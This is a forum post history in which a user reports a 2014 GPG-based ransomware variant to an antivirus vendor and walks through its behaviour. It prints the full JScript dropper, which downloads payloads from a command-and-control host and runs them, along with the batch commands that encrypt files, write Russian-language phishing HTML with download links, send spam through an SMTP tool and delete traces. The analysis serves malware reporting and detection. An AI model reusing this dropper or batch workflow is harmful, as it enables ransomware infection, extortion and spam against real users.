JAMEWT

Members, 9 posts

Posts posted by JAMEWT

  1. By the way: @JAMEWT (ESET member)

    You found this threat, posted it here, said thanks to yourself and also said to yourself that you added detection? :blink: :wacko:

    And after all this you praise yourself (OK, or ESET)?!

     

    I think there is something wrong!

     

    Edit: BTW, you also reported another Cryptolocker here. Is it the same cryptolocker? Or do you like to have a second sight a second time and say it will be added? ;)

    Edit2: OK, I see it's a downloader for this cryptolocker...

     

    I reported the mail received from ESET, and the thanks is not to me but to the text inside the post from ESET, because ESET does not answer here but by mail.

     

    I also reported another Cryptolocker = it is not the same cryptolocker.

  2. SAMPLES SENT TO ESET

    new cryptolocker variant
    ***********************************************************************************************

    File downloaded from: hxxp://5.199.171.47/patriote/sansviolence
    C&C IP address:
    5.199.171.47
    *********************************************************************************************************

    Can you please add detection?
     

  3. Since 2014/08/05 there is this new ransomware.

     

    On 2014/08/06 I sent you the sample and you added detection and blocked the download of the zip file, but ESET does not detect the btc file.

    https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/

     

    **********************************************************************************************************

    The ESET Malware Response Team has had the file since 2014/08/06:
    06/08/2014 20:05:16 Kernel ESET Il file 'D:\A MALWARE\keybtc.btc' è stato inviato a ESET per l'analisi.
    *****************************************************************************

     

     

    I EXPLAIN

     

    This *.JS file, after execution, downloads a lot of files and does a lot of work...

     

    Information thanks to @MalwareHunter (malwaretips.com)

     

    JS file

    ////////// autoreplicant bot /////////
    ///////////////////  var intoxicated twice ////////////////

    var nosensetoblock="collapseit.com",tfolder="%TEMP%\\",WshShell=WScript.CreateObject("WScript.Shell");function autoreply(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="%TEMP%\\keybtc.cmd",autorotatedomain="images";function CreateObject(c){return new ActiveXObject(c)}
    var WshShell=CreateObject("WScript.Shell"),tfolder=WshShell.ExpandEnvironmentStrings(tfolder),docrun="%TEMP%\\document.doc";try{autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/document.btc",""+tfolder+"document.doc"),WshShell.Run(""+docrun+"",1,0)}catch(docs){}autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/day.btc",""+tfolder+"day.btc");autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/null.btc",""+tfolder+"null.btc");
    autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/sad.btc",""+tfolder+"sad.btc");autoreply("hxxp://"+nosensetoblock+"/"+autorotatedomain+"/keybtc.btc",""+tfolder+"keybtc.cmd");

    WshShell.Run(""+genesis+"",0,0);

     

    OK, it downloads these files:

    hxxp://collapseit.com/images/sad.btc - MD5: e189b5ce11618bb7880e9b09d53a588f
    https://www.virustotal.com/it/file/97d27e1225b472a63c88ac9cfb813019b72598b9dd2d70fe93f324f7d034fb95/analysis/1406556814/

    hxxp://collapseit.com/images/null.btc - MD5: 778232ba5aa586021a27ec2bf4e7b99a
    https://www.virustotal.com/it/file/c201989c78d9f8a8c8a18577b3deb6baf71fbc13594e545015ba96d69da724dc/analysis/1407318858/

    hxxp://collapseit.com/images/day.btc - MD5: 352369b32c971e1a7f56ef29593abb44
    https://www.virustotal.com/it/file/1e56cc30ea50c74c6795a9aed142ad5e5fd51ddc17080f948cb23d647c5b8553/analysis/1407196678/

    hxxp://collapseit.com/images/document.btc - MD5: 50a561c0d0f0c49974dfb15763f73202
    https://www.virustotal.com/it/file/62a86e1ba6b2d629ec54822c1ca16ef995cd9f18965f03fa918486f2f3795192/analysis/1407320991/

    hxxp://collapseit.com/images/keybtc.btc - MD5: 3ca63d203556c63d5e0c06d78f6aae4c
    https://www.virustotal.com/it/file/37c73b3d6ba7d96cbf387f4436f6a2262af14b84f9c0a218fde1b28db5edd23f/analysis/1407331101/

    After execution:

     

    keybtc.btc (after drop: keybtc.cmd)

    C:\Users\%UserName%\AppData\Local\Temp>echo Key-Type: RSA 1>genrsa.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo Key-Length: 1024 1>>genrsa.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo Name-Real: genesis 1>>genrsa.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo Name-Comment: keybtc@gmail.com 1>>genrsa.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo Name-Email: keybtc@gmail.com 1>>genrsa.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo -----BEGIN PGP PUBLIC KEY BLOCK----- 1>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo Version: GnuPG v1 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo.1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo mQENBFPgfZQBCACwmI/ra8/PJnw1YAvQZ8mszyEtIfJ4GA2jTM3ih9qCWMRb3cCI 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo heeVFaBTyAp33AP0EGjRDcg7E4VihowO2zCqJa7QkEfxVLwYKbEiEEnns4VDNnut 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo eOsyHF/ZyiNshYUN3Fj+YiFMtOzEUcJEE0QuUfl2o0Ajl9BRz3cQPPSnUhKS/vmc 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo Fut1Y5GcJVWhjl4f51Grp1Q5lB9ndqCVGpG7PZ7tqQgA6934DOjGQQF3BK9ZuSJq 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo v4bMKs12cOndOIFuoim/KV5NL4wXlUes7GIlTp4P3izlobNlVfYKXgS4Vc/H/FiA 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo YVOaB7L4rVXwc7oixYSI1a4TwqXfifDhJNSRABEBAAG0ImtleWJ0YyAoa2V5YnRj 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo KSA8a2V5YnRjQGdtYWlsLmNvbT6JATgEEwECACIFAlPgfZQCGwMGCwkIBwMCBhUI 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo AgkKCwQWAgMBAh4BAheAAAoJEIUsFvyqtih1ly4IAJlYEiJX2VeXV77c8M/0PRtN 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo XAGmgFjt9WNvnMGlvAY88/QUMwMU9XV2gXTc+KiLacuagofhGpHOuZf3suSBYMDS 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo oi135YTGs1sAWOx2kBwmyW8rrNLZ84V4wa97I9nEbzIYB0thzr3euu0QTz78hj2v 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo Gai2uA82F45XFcjXhPKINbSgMCYIpbhfjUCMbSVy8+3rF9fUDWICVwzAof467GOI 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo b4SKcDkX5IOzDugDnKXvKwDNr9fcomZhhVUz5djF1TTORc0qXQye2GiFa6ZtE4aH 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo WFw6hKfBIgaJGFIqnr7be0Di1duWisnCYS2n9/VDcZpeOpv7uqc78KDJ+Ogm27W5 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo AQ0EU+B9lAEIAMcXK4tuglxptwQKg4aODX8OnSbAyAQW5QHTK9d4GG40vry8IJVx 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo pUYe7fgax7OIkKLnYjo0uNXnBD70e3Z80WhDK1/2eIC4MxqVAD4cKP2yKZOFLKi2 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo BJ7BdYk+y4d2MgqGuGIt84Wp0Zrcs1O32pS2lXfaBxjREaAUuqzy4MU0AJ5+5tK0 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo qeD1OTxJhYivIky/qrmDtMf0G/WzxULV1iy0pkDP/s44KmsQxept3MzmCMgdAXmg 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo 2ANdP5r+UOglQeLKBmyLhCAcNqvHPU5I2X5qWmAbU0Z8IT/M1m/SE0/r9VF63C+Y 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo g3HQQDVZYOFWqi2uHOoU/LZ157kgF5gYqNUAEQEAAYkBHwQYAQIACQUCU+B9lAIb 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo DAAKCRCFLBb8qrYodQp3B/0SeVJOLU+3gmq+R7VLqNbeS6NZ9KnZQvda3vyE0/+t 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo FGx3Xo6Gf4chi+hTY33Ph+/4xA0cFg3i2YDSZRunDKG3OavrRDIpF6SNIH/X/sPU 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo IQxATi1Sq/EmNzJdAqqqYNQT7YlWyVjI2pLcbberET+9LHIMcatnQ08GZQDViiSI 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo o7fW4sVYMgnRS5OXOwzMqW7wLuLbIGuTZQXTIOAoOhuZtfmy5woCRwF9sygYu5yw 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo iwQkX2P/Ffzwrpu92J8uqoVeUXdBV8bgnK92KKKi/F4czak/DLa453cLlwozPxSv 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo 6/RKzQXVaopzuOdvdRTwKSb+mFr+gsMlQ1t7xNcMdW84 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo =yxjK 1>>2048key.btc
    C:\Users\%UserName%\AppData\Local\Temp>echo -----END PGP PUBLIC KEY BLOCK----- 1>>2048key.btc

    "C:\Users\%UserName%\AppData\Local\Temp\svchost.exe" -r keybtc --yes --trust-model always --no-verbose -q --encrypt-files "C:\Users\%UserName%\AppData\Local\Temp\secring.gpg"

    (Remark: svchost.exe is the dropped null.btc after renaming.)

     

    (Creates another JS file)


    Also creates html (filename: ltr*.html) files with links like this:

    hxxp://bit.ly/invoice2014 - (ESET blocks all the downloads)

    C:\Users\%UserName%\AppData\Local\Temp>echo var earthlingsfilm="collapseit.com",WshShell=WScript.CreateObject("WScript.Shell");function touchdown(c,d){var b=new ActiveXObject("MSXML2.XMLHTTP");b.onreadystatechange=function(){if(4===b.readyState){var a=new ActiveXObject("ADODB.Stream");a.open();a.type=1;a.write(b.ResponseBody);a.position=0;a.saveToFile(d,2);a.close()}};b.open("GET",c,!1);b.send()}var genesis="autoreplicant";touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/coherence.btc","coherence.btc"); 1>autoreplicant.js

    C:\Users\%UserName%\AppData\Local\Temp>echo touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/lsass.btc","lsass.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spool.btc","spool.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/spoolsv.btc","spoolsv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/sv.btc","sv.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/tobi.btc","tobi.btc");touchdown("hxxp://"+earthlingsfilm+"/"+genesis+"/collapse.btc","collapse.btc"); 1>>autoreplicant.js

    C:\Users\%UserName%\AppData\Local\Temp>copy /b "C:\Users\%UserName%\AppData\Local\Temp\collapse.btc" + "C:\Users\%UserName%\AppData\Local\Temp\tobi.btc" ttl.exe

    C:\Users\%UserName%\AppData\Local\Temp>del /f /q tobi.btc   & del /f /q collapse.btc

    C:\Users\%UserName%\AppData\Local\Temp>RENAME lsass.btc lsass.exe

    C:\Users\%UserName%\AppData\Local\Temp>RENAME coherence.btc coherence.exe

    C:\Users\%UserName%\AppData\Local\Temp>RENAME spoolsv.btc spoolsv.exe

    C:\Users\%UserName%\AppData\Local\Temp>RENAME spool.btc blat.lib

    C:\Users\%UserName%\AppData\Local\Temp>RENAME sv.btc blat.dll

    C:\Users\%UserName%\AppData\Local\Temp>ttl.exe -f ttl.pwd

    C:\Users\%UserName%\AppData\Local\Temp>taskkill /f /im 1Cv8N.exe

    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\autoreplicant.js"

     

    (Remark: These *.btc files are dropped by the second JS file, autoreplicant.js.)

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr1.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr1.html

    C:\Users\%UserName%\AppData\Local\Temp>echo КаÐs и дÐlÐlÐlÐ?аN€Ð¸Ð?алиNNS N Ð?аN?иÐL N€N?ÐsÐlÐ?ÐlдNN‚Ð?ÐlÐL, ÐzеN€ÐµNN‹Ð»Ð°NŽ ВаÐL NN‡ÐµN‚ длNZ ÐlÐzлаN‚N‹ (Ð?Ðl Ð?лÐlжеÐ?ии). ОN€ÐlаÐ?изN?ÐaN‚е, ÐzÐlжалN?ÐaNN‚а, ÐzлаN‚еж.<br> 1>>ltr1.html

    C:\Users\%UserName%\AppData\Local\Temp>echo КÐlÐlда бN?N…ÐlалN‚еN€Ð¸NZ Ð?Nе ÐzN€ÐlÐ?едеN‚, ÐlN‚ÐzиN?иN‚еNNS ÐLÐ?е - NZ ÐzN€ÐlÐ?еN€NŽ ÐzN€Ð¸N…Ðlд деÐ?еÐl. <br> 1>>ltr1.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ДÐlÐlÐlÐ?ÐlN€ N? ВаN иÐLееN‚NNZ? Ð?ли ÐLÐ?е Ð?N‹NлаN‚NS ÐsÐlÐzиNŽ? <br><br> 1>>ltr1.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr1.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/invoice2014">Ð?N‡ÐµN‚_длNZ_ÐlÐzлаN‚N‹ (аÐ?Ðl.).zip</a> 1>>ltr1.html

    C:\Users\%UserName%\AppData\Local\Temp>set RND0=22361

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr2.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?и бN?N…ÐlалN‚еN€Ð° ÐzÐlÐzN€ÐlNили ÐzеN€ÐµNлаN‚NS ВаÐL NN‡ÐµN‚ Ð?Ф-14-22361 (NÐL. ÐzN€Ð¸Ð»ÐlжеÐ?ие).<br>Ð’N‹ ÐLÐlÐlли бN‹ N?зÐ?аN‚NS, бN‹Ð»Ð° ли ÐzÐl Ð?еÐLN? ÐlÐzлаN‚а?<br>ÐzÐl даÐ?Ð?N‹ÐL Ð?аN?еÐa базN‹ ÐzÐl NTN‚ÐlÐLN? ÐzлаN‚ежN? за ВаÐLи Ð?иNиN‚ дÐlлÐl. Ð’ÐlзÐLÐlжÐ?Ðl, ÐsаÐsаNZ-N‚Ðl ÐlN?ибÐsа.<br>ÐzN€ÐlÐ?еN€NSN‚е, ÐzÐlжалN?ÐaNN‚а.<br><br> 1>>ltr2.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr2.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/invoice142014">Ð?N‡ÐµN‚ Ð?Ф-14-22361_2014.zip</a> 1>>ltr2.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr3.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐLÐ?ажаеÐLN‹Ðµ ÐsÐlллеÐlи, <br> 1>>ltr3.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐsN‹ ÐzN€ÐlÐ?ÐlдиÐL ежеÐLеNNZN‡Ð?N?NŽ NÐ?еN€ÐsN?. Ð’ ÐzN€Ð¸Ð»ÐlжеÐ?ии - ÐzN€ÐlеÐsN‚ ÐÐsN‚а ÐzÐl ВаN?еÐLN? ÐzN€ÐµÐ´ÐzN€Ð¸NZN‚иNŽ.<br>Ð?аÐL ÐzÐlлN?N‡Ð°ÐµN‚NNZ дÐlлÐl ÐzN€Ð¸ÐLеN€Ð?Ðl Ð?а 10 N‚N‹N. ÐzN€ÐlÐ?еN€NSN‚е ÐzÐl NÐ?ÐlиÐL базаÐL, Ð?Nе ли ÐzN€Ð°Ð?илNSÐ?Ðl. <br> 1>>ltr3.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ЖдN? ÐlN‚Ð?еN‚а, NÐzаNибÐl. <br><br> 1>>ltr3.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr3.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/revise2014">ÐzN€ÐlеÐsN‚ ÐÐsN‚а NÐ?еN€Ðsи-2014.zip</a> 1>>ltr3.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr4.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr4.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ ÐzN€ÐlÐ?еN€Ð¸Ð»Ð° ÐlÐzлаN‚N? ÐzÐl NN‚аN€N‹ÐL ÐzÐlNN‚аÐ?ÐsаÐL. <br> 1>>ltr4.html

    C:\Users\%UserName%\AppData\Local\Temp>echo К ÐzиNNSÐLN? ÐzN€Ð¸Ð»ÐlжеÐ?а ÐsÐlÐzиNZ ÐÐsN‚а NÐ?еN€Ðsи ÐzÐl ВаN?еÐLN? ÐzN€ÐµÐ´ÐzN€Ð¸NZN‚иNŽ. Ð?ÐlÐlлаNÐ?Ðl Ð?аN?еÐa иÐ?N„ÐlN€ÐLаN†Ð¸Ð¸ Ð’N‹ Ð?аÐL Ð?еÐLÐ?ÐlÐlÐl Ð?едÐlÐzлаN‚или ÐzÐl дÐ?N?ÐL NN‡ÐµN‚аÐL.<br> 1>>ltr4.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐzN€ÐlÐ?еN€NSN‚е N?ÐsазаÐ?Ð?N‹Ðµ даÐ?Ð?N‹Ðµ, ÐzÐlжалN?ÐaNN‚а. <br><br> 1>>ltr4.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr4.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/revisecopy2014">КÐlÐzиNZ ÐÐsN‚а NÐ?еN€Ðsи (2014).zip</a> 1>>ltr4.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr5.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ДеÐ?NS дÐlбN€N‹Ða, <br> 1>>ltr5.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐsN‹ ÐzN€ÐlÐzлаN‚или ÐzÐl ВаN?еÐLN? NN‡ÐµN‚N? (NÐsаÐ?-ÐsÐlÐzиNZ ÐzлаN‚ежÐ?ÐlÐlÐl ÐzÐlN€N?N‡ÐµÐ?иNZ Ð? аN‚N‚аN‡Ðµ). ÐzN€ÐlÐ?еN€NSN‚е ÐzN€Ð¸N…Ðlд деÐ?еÐl и ÐlN‚ÐzиN?иN‚еNNS.<br>ÐtадеNŽNNS, N N€ÐµÐsÐ?изиN‚аÐLи Ð?Nе Ð?ÐlN€ÐLалNSÐ?Ðl. <br><br> 1>>ltr5.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr5.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/scancopy2014">CÐsаÐ?-ÐsÐlÐzиNZ ÐzлаN‚ежÐ?ÐlÐlÐl ÐzÐlN€N?N‡ÐµÐ?иNZ.zip</a> 1>>ltr5.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr6.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ ÐzN€ÐlÐ?ела ÐzлаN‚еж ÐzÐl ВаN?еÐLN? NN‡ÐµN‚N? (ÐzлаN‚ежÐsа N ÐlN‚ÐLеN‚ÐsÐlÐa баÐ?Ðsа Ð?Ðl Ð?лÐlжеÐ?ии). ÐzÐlNÐLÐlN‚N€Ð¸N‚е, ÐzN€Ð¸N?ли ли деÐ?NSÐlи. ЖдN? ÐlN‚Ð?еN‚а, NÐzаNибÐl. <br><br> 1>>ltr6.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr6.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/payment20143991">ÐzлаN‚ежÐsа_ÐlN‚ÐLеN‚Ðsа баÐ?Ðsа (aug).zip</a> 1>>ltr6.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr7.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐzеN€ÐµNN‹Ð»Ð°NŽ ВаÐL ÐÐsN‚N‹ ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸ ÐzÐl ДÐlÐlÐlÐ?ÐlN€N? ÐlN‚ 02.08.2014 ÐlÐlда (Ð?Ðl Ð?лÐlжеÐ?ии). ÐzÐlNÐLÐlN‚N€Ð¸N‚е, Ð?Nе ли N‚аÐL Ð?ÐlN€ÐLалNSÐ?Ðl ÐzÐl NÐlдеN€Ð¶Ð°Ð?иNŽ. ЕNли N‡N‚Ðl, ÐLN‹ NÐl NÐ?ÐlеÐa NN‚ÐlN€ÐlÐ?N‹ ÐzÐlдÐzиNN‹Ð?аеÐL  дÐlÐsN?ÐLеÐ?N‚N‹ и Ð?N‹NN‹Ð»Ð°ÐµÐL ВаÐL ÐlN€Ð¸ÐlиÐ?алN‹. <br><br> 1>>ltr7.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr7.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/recandtransmiss2014">ÐÐsN‚N‹ ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸.zip</a> 1>>ltr7.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr8.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐtаN?а бN?N…ÐlалN‚еN€Ð¸NZ Ð?е ÐLÐlжеN‚ Ð?аÐaN‚и Ð?еNÐsÐlлNSÐsÐl ÐÐsN‚ÐlÐ? ÐzN€Ð¸ÐµÐLа-ÐzеN€ÐµÐ´Ð°N‡Ð¸ ÐzÐl дÐlÐlÐlÐ?ÐlN€Ð°ÐL, заÐsлNŽN‡ÐµÐ?Ð?N‹ÐL N ВаÐLи.<br>ÐzN€ÐlблеÐLа Ð? N‚ÐlÐL, N‡N‚Ðl N? Ð?аN NÐl дÐ?NZ Ð?а деÐ?NS дÐlлжÐ?а Ð?аN‡Ð°N‚NSNNZ ÐzN€ÐlÐ?еN€Ðsа ФÐtÐ?.<br>ÐsÐlжеN‚е ÐzÐlNÐLÐlN‚N€ÐµN‚NS, еNN‚NS ли N? ВаN ÐlN€Ð¸ÐlиÐ?алN‹ NTN‚иN… дÐlÐsN?ÐLеÐ?N‚ÐlÐ? (NÐsаÐ?N‹ Ð?Ðl Ð?лÐlжеÐ?ии)?<br> 1>>ltr8.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ÐzN€ÐlN?N? ÐlN‚Ð?еN‚иN‚NS ÐLаÐsNиÐLалNSÐ?Ðl ÐlÐzеN€Ð°N‚иÐ?Ð?Ðl. Ð?ÐzаNибÐl. <br><br> 1>>ltr8.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr8.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/rectrans2014">ÐÐsN‚N‹ ÐzÐl ÐzN€Ð¸ÐµÐLN?-ÐzеN€ÐµÐ´N‡Ð¸_2014Ðl.zip</a> 1>>ltr8.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr9.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ЗдN€Ð°Ð?NN‚Ð?N?ÐaN‚е,<br> 1>>ltr9.html

    C:\Users\%UserName%\AppData\Local\Temp>echo Ð’ NÐ?NZзи N изÐLеÐ?еÐ?иNZÐLи Ð? N†ÐµÐ?ÐlÐ?ÐlÐa ÐzÐlлиN‚иÐsе Ð?аN?еÐa ÐsÐlÐLÐzаÐ?ии, ÐLN‹ N€Ð°Ð·N€Ð°Ð±ÐlN‚али N‚иÐzÐlÐ?Ðlе дÐlÐzÐlлÐ?иN‚елNSÐ?Ðlе NÐlÐlлаN?еÐ?ие длNZ ÐzÐlдÐzиNаÐ?иNZ N Ð?аN?иÐLи аÐsN‚N?алNSÐ?N‹ÐLи ÐsÐlÐ?N‚N€Ð°ÐlеÐ?N‚аÐLи.<br>ОзÐ?аÐsÐlÐLNSN‚еNNS N дÐlÐsN?ÐLеÐ?N‚ÐlÐL Ð? ÐzN€Ð¸Ð»ÐlжеÐ?ии и ÐlN‚Ð?еN‚NSN‚е ÐzÐl ÐlÐlN‚ÐlÐ?Ð?ÐlNN‚и ÐzÐlдÐzиNаÐ?иNZ. <br> 1>>ltr9.html

    C:\Users\%UserName%\AppData\Local\Temp>echo Ð’ NлN?N‡Ð°Ðµ Ð?еÐlбN…ÐlдиÐLÐlNN‚и, ÐLN‹ ÐlÐlN‚ÐlÐ?N‹ N€Ð°NNÐLÐlN‚N€ÐµN‚NS ВаN?и ÐzN€Ð°Ð?Ðsи. <br> 1>>ltr9.html

    C:\Users\%UserName%\AppData\Local\Temp>echo Ð?ÐzаNибÐl. <br><br> 1>>ltr9.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr9.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/supplementaryagr3381">Ð?иÐzÐlÐ?Ðlе дÐlÐz.NÐlÐlлаN?еÐ?ие.zip</a> 1>>ltr9.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /><br> 1>ltr10.html

    C:\Users\%UserName%\AppData\Local\Temp>echo ДеÐ?NS дÐlбN€N‹Ða, <br> 1>>ltr10.html

    C:\Users\%UserName%\AppData\Local\Temp>echo Ð’ ÐzN€ÐlдÐlлжеÐ?ие ÐzеN€ÐµÐlÐlÐ?ÐlN€ÐlÐ? N Ð?аN?иÐL диN€ÐµÐsN‚ÐlN€ÐlÐL, Ð?аÐzN€Ð°Ð?лNZNŽ ВаÐL длNZ N€Ð°NNÐLÐlN‚N€ÐµÐ?иNZ ÐzN€ÐlеÐsN‚ дÐlÐlÐlÐ?ÐlN€Ð° (Ð? ÐzN€Ð¸Ð»ÐlжеÐ?ии). ОзÐ?аÐsÐlÐLNSN‚еNNS N дÐlÐsN?ÐLеÐ?N‚ÐlÐL.<br>ÐzN€ÐlNNSба иNÐzN€Ð°Ð?леÐ?иNZ Ð?Ð?ÐlNиN‚NS Ð? N€ÐµÐ¶Ð¸ÐLе ÐzN€Ð°Ð?ÐlÐs.<br><br>Ð?ÐzаNибÐl<br><br> 1>>ltr10.html

    C:\Users\%UserName%\AppData\Local\Temp>echo <b>ВлÐlжеÐ?иNZ (1):</b><br> 1>>ltr10.html

    C:\Users\%UserName%\AppData\Local\Temp>echo 1.  <a href="hxxp://bit.ly/draft77182">ÐzN€ÐlеÐsN‚ дÐlÐlÐlÐ?ÐlN€Ð° (2014Ðl).zip</a> 1>>ltr10.html

    echo spoolsv.exe ltr!R!.html -server smtp.mail.ru -port 587 -f !validmail! -u !validmail! -pw !Spamail! -priority 1 -sensitivity 2 -noh -noh2 -ss -html -to %a 1>>readbook.cmd )  
     

    *There are some more commands like this. It seems that this script also sends spam...

     

     

     

    And finally... it deletes a lot of files and opens a link:

    C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Roaming\gnupg\*.*"
    C:\Users\%UserName%\AppData\Roaming>rmdir /s /q "C:\Users\%UserName%\AppData\Roaming\gnupg"
    C:\Users\%UserName%\AppData\Roaming>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\sdelete.exe"
    C:\Users\%UserName%\AppData\Roaming>start hxxp://bit.ly/keybtc
    C:\Users\%UserName%\AppData\Roaming>cd "C:\Users\%UserName%\AppData\Local\Temp"
    C:\Users\%UserName%\AppData\Local\Temp>del /f /q "C:\Users\%UserName%\AppData\Local\Temp\pubring.bak"
